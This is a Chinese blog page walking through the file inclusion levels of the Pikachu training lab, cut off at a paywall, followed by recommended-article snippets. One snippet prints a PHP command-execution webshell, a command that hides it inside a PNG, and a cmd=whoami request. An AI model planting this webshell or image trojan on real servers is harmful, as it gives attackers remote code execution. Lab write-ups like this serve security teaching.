pikachu File Inclusion 文件包含漏洞 (皮卡丘漏洞平台通关系列)

最新推荐文章于 2024-07-25 08:33:55 发布
原创 最新推荐文章于 2024-07-25 08:33:55 发布 · 9.7k 阅读 · 38 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #靶机

目录

一、来自官方的简介

二、来自小可爱的通关步骤

第一关  File Inclusion(local)

1、读取“隐藏”文件

2、读取系统文件

3、结合文件上传getshell

第二关  File Inclusion(remote)

1、直接包含木马

2、包含写木马的文件

先安利一下自己之前写过的DVWA通关--文件包含(File Inclusion)

在DVWA通关中写过的一些注意点可能在本篇中就不会再赘述了,所以如果不是针对pikachu的文件包含漏洞通关,可以再看一下这篇DVWA的文件包含漏洞通关,写的比本篇pikachu的更全更细更费心。

一、来自官方的简介

pikachu中文件包含漏洞的概述如下

那么在下文中,File Inclusion(local)关卡会尝试读取系统敏感信息,并结合文件上传漏洞包含图片马,获取webshell;File Inclusion(remote)关卡会尝试直接包含木马,以及包含写入木马的文件。

在开始之前必须知道的一点是,php的文件包含不管文件后缀名是什么,只要包含php代码,就可以被当作php代码解析。

二、来自小可爱的通关步骤

第一关  File Inclusion(local)

-------的地方是个下拉框,可以选NBA球星,比如选了Allen Iverson之后,页面是下图这样,url是http://192.168.101.16/pikachu/vul/fileinclude/fi_local.php?filename=file2.php&submit=%E6%8F%90%E4%BA%A4

可见其中包含了一个文件file2.php,很可能是文件包含,并且既然是通过URL参数从前端传到后端的,那就是用户可以控制的了,如果再没有严格的过滤,就很可能有文件包含漏洞呢。(~ ̄▽ ̄)~

1、读取“隐藏”文件

首先,由于观察到上图的filename是file2.php,猜测这里其他文件名可能也是个filex.php(x是数字)的格式。

把5个NBA球星都选一遍,发现文件名确实是file1.php~file5.php。

那有没有可能这套文件里面就有废弃或者隐藏的文件咧?

把burpsuite请出来爆破一下:

把下图这个请求报文send to intruder

然后像下面这样设置一下:

爆破位置设置为文件名中的数字,payload设置为Numbers,从6到100,步长为1,点start attack开始爆破

最低0.47元/天 解锁文章
QT 设置第二个界面并从第一个界面跳转到第二个界面
cheryl88的博客
09-23 7391
这里写目录标题新建另一个界面跳转主窗口布局 新建另一个界面 在解决方案资源管理器,右键添加add class Qt 然后一直点下一步就完成了 跳转 从上一次登录界面的按钮,点击跳转 主窗口布局
QT中多设计师窗口创建及切换
qq_37273544的博客
05-13 3066
在项目开发中,上位机有时候需要多个页面显示,如登录界面、主窗口、子窗口等,为了编程简单,QT提供了可视化 设计师编辑工具,默认创建工程后只有一个Ui界面,本文将记录如何创建多个Ui界面,并在他们中间任意切换显示。 1:新建一个带UI的普通工程,这里及后面几个UI都可以是mainWindow或者是Dialog,无任何影响。 2:新工程建好后只有一个ui界面,界面来我们在工程文件中右键新加一个新文件,...
DVWA平台文件包含漏洞实验
KUKULI233的博客
05-28 856
一、概念 包含就是浏览,但是不同的是遇见可执行语句将执行 漏洞成因是因为开发人员为使代码更灵活,将文件设为变量,调用的时候未做过滤处理,就可以包含恶意文件 是PHP语言的漏洞,实验需要先配好php服务环境,此处在win7上开启phpstudy Require:找不到被包含的文件会报错并停止 Include:报错,继续执行 _once :调用重复文件时只执行一次 url特征: ?page ?file ?home 目录遍历可以读取web目录以外的其他目录,根源在于对路径访问权限设置不严格 文件包含是利用函数包含
UEFI-dsc.dec.fdf文件
m0_49918601的博客
09-10 836
UEFI-dsc.dec.fdf文件   上一篇介绍了 .inf文件, .inf文件相当于Visual Studio中的工程文件。而 .dsc(Platform Description File)则相当于Visual Studio中的 solution 文件。每个包都要包含一个.dec(Package Declaration File)文件、一个 .dsc文件。如果这个包还用于固件Iamge或Option Rom Image的生成,则还需要添加 .fdf(Flash Description File)文件.
vue中assets和static的区别
qq_41662119的博客
10-28 563

 
 Vue中assets和static的区别
 再一次框架定型中,与同事在静态资源的存放上有了一些分歧,后来经过查阅总结如下:
 
 
  
 相同点:
  
 assets和static两个都是存放静态资源文件。项目中所需要的资源文件图片,字体图标,样式文件等都可以放在这两个文件下,这是相同点 &#...
Pikachu靶场通关笔记--File Inclusion(文件包含漏洞)
weixin_45908624的博客
12-13 1041
文件包含漏洞
文件包含漏洞pikachu与DVWA靶场中的文件包含漏洞通关
qq_68163788的博客
05-27 2317
文件包含漏洞是一种常见的Web安全漏洞,攻击者可以通过包含恶意文件来执行任意代码或获取敏感信息。在DVWA靶场中,通过利用文件包含漏洞,可以获取系统文件、敏感信息或者执行恶意代码。pikachu可以通过构造恶意文件路径,利用DVWA中的文件包含漏洞来获取管理员权限或者对系统进行攻击。为了防范文件包含漏洞,开发者应该避免直接包含用户输入的文件,并且对输入进行严格的过滤和验证。通过了解和掌握文件包含漏洞的原理和利用方法,可以帮助提高Web应用程序的安全性。
pikachu靶场(File Inclusion(文件包含)通关教程)
记录学习
06-07 2259
pikachu靶场文件包含通关教程
Pikachu靶场之文件包含漏洞详解
m0_46467017的博客
05-19 9717
Pikachu靶场之文件包含漏洞详解前言文件包含漏洞简述1.漏洞描述2.漏洞原因3.漏洞危害4.如何防御第一关 File Inclusion(local)1.尝试读取"隐藏"文件2.读取不同文件夹文件3.读取系统文件4.结合文件上传getshell第二关 File Inclusion(remote)包含写木马的文件 前言 本篇文章用于巩固对自己文件包含漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu File Inclusion 文件包含漏洞皮卡丘漏洞平台通关系列) 链接: 【
vue中assets与static的区别
ocean_stars的博客
06-25 2169
vue中assets与static的区别 相同点:资源在html中使用,都是可以的。 不同点:使用assets下面的资源,在js中使用的话,路径要经过webpack中file-loader编译,路径不能直接写。 assets中的文件会经过webpack打包,重新编译,推荐该方式。而static中的文件,不会经过编译。项目在经过打包后,会生成dist文件夹,static中的文件只是复制一遍而已。简单来说,static中建议放一些外部第三方,自己的放到assets,别人的放到static中。 注意:如果把图片放
详解Vue-cli中的静态资源管理(src/assets和static/的区别)
12-04
你可能注意到了我们的静态资源共有两个目录src/assets和static/,你们它们之间有怎样的区别呢? 资源打包 为了回答这个问题,我们需要了解webpack是如何处理静态资源的。在所有的*.vue文件中你所有的templates 和CSS 都被vue-html-loader 和css-loader 查询资源的URLs解析. 比如说, 在 img src=”./logo.png” 和background: url(./logo.png) 中./logo.png是一个相对资源路径,并且会被Webpack视为一个模块依赖来解析。 因为./logo.png并非一个Javascript,当将它
Pikachu-File Inclusion
baynk的博客
11-19 981
0x00 File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函...
Vue项目中 assets 和 static 的区别
weixin_59685936的博客
07-25 754
Vue项目中 assets 和 static 的区别
UEFI原理与编程(七):包及.dsc、.dec、.fdf文件
热门推荐
kaliopensourcextu
04-27 2万+
包及.dsc、.dec、.fdf文件  前面的文章中比较详细介绍了UEFI工程文件即.inf。UEFI的包中一般都会包含一个.dsc文件和一个dec文件。在包生成固件Image、Option Rom Image,这个包还要包含.fdf文件。
Vue中的assets和static目录:使用场景及区别解析
alive_new的博客
09-23 7633
在Vue项目中,assets目录和static目录是用于存放静态资源文件的两个常见目录。它们在使用场景和特性上有所不同:assets目录适用于需要经过构建处理的静态资源,而static目录适用于不需要经过构建处理的静态资源。通过选择合适的目录,我们可以充分利用Webpack的优化功能,提高项目的性能和开发效率。
VUE中assets与static的区别
OldStreet61的博客
11-05 715
转自:https://www.jianshu.com/p/8341edbc7436 1、相同点: 文件夹中的资源在html中使用都是可以的。 2、不同点: 使用assets下面的资源,在js中使用的话,路径要经过webpack中的file-loader编译,路径不能直接写 2.1 static : 该目录下的文件是不会被wabpack处理的,它们会被直接复制到最终的打包目录下面(默认是 dist/static ),且必须使用绝对路径来引用这些文件。 这是通过在 config.js 文件中的 build.a
keil生成带有时间戳的hex文件(20201210)
木牛的博客
05-24 505
里面放置一个bat文件名,文件名随意,我们待会儿编写这个文件,图中示例为。是keil内变量,代表的是当前target,在本例子中为targe名。文件不会覆盖,如果你编译次数过多,文件数目会越来越多,请及时清理。为当前目录,当前目录为.uvprojx工程文件的目录,即在。为keil内变量,代表的是当前target,在本例子中为。(如果Run #1被占用,可以使用Run #2)为keil内变量,代表的是当前工程名,本例子中为。代表输入的第一个参数,在此例子中是。创建前运行选项(2个)创建后运行选项(2个)
vue static和assets的区别
顺其自然~专栏
04-19 566
static和assets的区别,原理就在于webpack是如何处理静态资源的 assets 1)在vue组件中,所有模板和css都会被vue-html-loader和css-loader解析,并查找资源url。 例:<img src="./logo.png" /> 或者background: url("./logo.png")   因为./logo.png是相对的资源路径,将会由webpack解析为模块依赖; 2)由于logo.png不是js,当被视作模块依赖时,需要使用url...
pikachu中getimagesize文件包含漏洞
最新发布
08-08
Pikachu 靶场中,`getimagesize` 函数的使用是文件上传漏洞的一个关键点,其目的是通过验证文件是否为合法的图像文件来防止恶意文件上传。然而,攻击者可以通过构造带有文件幻数的图片木马绕过这一验证机制,从而实现恶意文件的上传和执行。 `getimagesize` 函数通过检查文件头部的幻数(Magic Number)来判断文件是否为合法的图像文件。例如,PNG 文件的幻数是 `89504E47`,JPEG 文件的幻数是 `FFD8FF`。由于该函数仅检查文件头部的幻数和扩展名,攻击者可以将恶意代码(如 PHP 木马)嵌入到图像文件的尾部,从而绕过验证机制[^3]。 ### 利用方法 1. **构造图片木马** 使用工具(如 `copy` 命令)将 PHP 木马代码嵌入到正常图像文件的末尾。例如,在 Windows 环境下,可以使用以下命令将 `shell.php` 和 `image.png` 合并成一个新的文件 `malicious.png`: ```bash copy /b image.png + shell.php malicious.png ``` 其中,`shell.php` 的内容如下: ```php <?php if (isset($_REQUEST['cmd'])) { $cmd = ($_REQUEST['cmd']); system($cmd); } ?> ``` 2. **上传图片木马** 在 Pikachu 靶场的文件上传功能中,尝试上传构造好的 `malicious.png` 文件。由于 `getimagesize` 会检测到文件头部的 PNG 幻数,因此该文件会被认为是一个合法的图像文件,从而绕过验证机制[^2]。 3. **获取 Web Shell** 成功上传后,访问上传路径并执行 `malicious.png` 文件。此时,攻击者可以通过 URL 参数传递命令,例如: ``` http://pikachu/upload/malicious.png?cmd=whoami ``` 这将执行 `whoami` 命令,并返回服务器的当前用户信息。 4. **结合文件包含漏洞** 如果目标系统存在文件包含漏洞,可以将上传的图片木马作为参数传递给 `include()` 或 `require()` 函数。例如: ```php include 'malicious.png'; ``` 通过这种方式,攻击者可以远程包含并执行上传的木马文件,从而实现远程代码执行(RCE)[^1]。 ### 防御措施 - **采用白名单验证文件类型** 严格限制上传文件的类型,仅允许特定的图像格式(如 JPEG、PNG)。 - **验证文件的后缀名和 MIME 类型** 不仅检查文件的扩展名,还需通过 `getimagesize` 或其他方式验证文件的真实类型。 - **对文件进行重命名** 上传后对文件进行随机重命名,避免攻击者通过已知文件名直接访问木马文件。 - **限制文件大小** 设置上传文件的最大大小,防止上传过大的恶意文件。 - **进行二次渲染** 对上传的图像文件进行二次渲染,清除可能嵌入的恶意代码。 - **不要暴露上传路径** 避免直接暴露上传文件的路径,防止攻击者直接访问上传的文件。 --- ###
评论 3
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值